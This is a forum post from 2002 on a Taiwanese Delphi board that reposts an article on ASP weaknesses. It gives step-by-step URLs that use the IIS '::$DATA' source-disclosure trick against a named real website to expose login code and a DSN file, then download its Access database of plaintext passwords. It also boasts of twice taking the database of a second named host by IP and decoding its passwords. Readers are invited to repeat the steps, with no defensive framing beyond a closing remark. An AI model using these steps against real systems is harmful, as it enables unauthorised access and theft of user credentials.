全國最多中醫師線上諮詢網站-台灣中醫網
發文 回覆 瀏覽次數:1389
推到 Plurk!
推到 Facebook!

ASP 的漏洞

 
jackkcg
站務副站長


發表:891
回覆:1050
積分:848
註冊:2002-03-23

發送簡訊給我
#1 引用回覆 回覆 發表時間:2002-07-17 22:43:04 IP:61.221.xxx.xxx 未訂閱
此為轉載之文章 其實 ASP 的漏洞已經算很少了,想要找到資料庫的實際位置也不簡單. 但程式設計師常常忘記仔細的檢查是否有漏洞, 所以才有可能導致網站資料被竊取的事件發生. 開始舉例: 我們先講一個最簡單的參數 (::$DATA) 這個參數有什麼用呢?很簡單~他可以讓您看到 ASP 的原始程式! http://y2kpts.iii.org.tw/login.asp http://y2kpts.iii.org.tw/login.asp::$DATA 請同學到上面兩頁看看(要看原始檔唷!) 看到了嗎?沒錯!ASP 的程式碼被我們看見囉! 好!我們打入 ::$DATA 參數後可以在原始檔中看到下面這段. xxxx alert("請輸入您的 密碼!!") } else { document.f1.action="checkuser.asp" <看到了吧! document.f1.submit() } } xxxx 看到沒!checkuser.asp 就是檢查帳號密碼的東西! 簡單!如法泡製! http://y2kpts.iii.org.tw/checkuser.asp::$DATA 原始檔如下: xxxxx FileName=Server.MapPath("y2k.dsn") <注意這段 Conn.Open "FileDSN=" & FileName sql="select * from 使用者權限 where 帳號=`" & user & "` and 密碼=`" & passwd & "`" Set RS=Conn.Execute(sql) if Not RS.EOF then xxxxx end 看!我們找到 DSN 了!y2k.dsn 再來! http://y2kpts.iii.org.tw/y2k.dsn [ODBC] xxxx DefaultDir=c:inetpubftprooty2kpts DBQ=y2k.mdb 看到了吧!他的資料庫就是 y2k.mdb ! 試試能不能抓下來! http://y2kpts.iii.org.tw/y2k.mdb 哇!可以下載ㄟ!爽! 下載完趕快看看裡面有啥好料的~ 打開看看~裡面有個 使用者權限 的資料表唷! 快打開!哇!~天呀!密碼都沒有編碼過!~ 帳號密碼看的一清二處說!~這這...太簡單了吧!? 難道所有的 ASP 網站都能這樣ㄎ一ㄤ資料庫嗎? 答案是否定的!我們是靠著 ::$DATA 參數才能找到資料庫的! 那...要是這參數不能用了呢? 沒關係!還有別的辦法! http://140.119.74.99/ZanyBBS/ 這個站筆者曾經兩度ㄎ一ㄤ到資料庫.. 怎麼做到的?他們提供 ZanyBBS 原始程式供下載.. 資料庫位置擺明了告訴你嘛! 不過這 Zany 也不是省油的燈!使用者的 PassWord 有經過編碼! 怎麼解?簡單~ ”原始程式供下載”~就是說~編碼方式裡面也找的到啦! 看看他是怎麼解碼的~如法泡製即可~ 以上是我在ASP技術廣場看到的~~~ 真是嚇死人了~~~
------
**********************************************************
哈哈&兵燹
最會的2大絕招 這個不會與那個也不會 哈哈哈 粉好

Delphi K.Top的K.Top分兩個字解釋Top代表尖端的意思,希望本討論區能提供Delphi的尖端新知
K.表Knowlege 知識,就是本站的標語:Open our mind
系統時間:2024-03-29 22:54:54
聯絡我們 | Delphi K.Top討論版
本站聲明
1. 本論壇為無營利行為之開放平台,所有文章都是由網友自行張貼,如牽涉到法律糾紛一切與本站無關。
2. 假如網友發表之內容涉及侵權,而損及您的利益,請立即通知版主刪除。
3. 請勿批評中華民國元首及政府或批評各政黨,是藍是綠本站無權干涉,但這裡不是政治性論壇!